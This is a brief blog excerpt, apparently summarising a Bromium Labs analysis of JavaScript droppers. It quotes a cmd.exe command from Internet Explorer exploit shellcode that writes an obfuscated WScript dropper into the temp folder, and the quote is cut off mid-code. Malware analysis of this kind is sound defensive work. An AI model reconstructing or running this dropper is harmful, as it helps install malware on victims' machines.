Oh look – JavaScript Droppers
One of them is the shellcode from an Internet Explorer exploit, which instead of downloading a binary executes the following CMD command:
Windows/syswow64/cmd.exe cmd.exe /q /c cd /d "%tmp%" && echo var w=g("WScript.Shell"),a=g("Scripting.FileSystemObject"),w1=WScript;try{m=w1.Arguments;u=600;o="***";w1.Sleep(u*u);var n=h(m(2),m(1),m(0));if (n.indexOf(o)^>3){k=n.split(o);l=k[1].split(";");for (var i=0;i^
https://labs.bromium.com/2015/06/12/oh-look-javascript-droppers/
No comments:
Post a Comment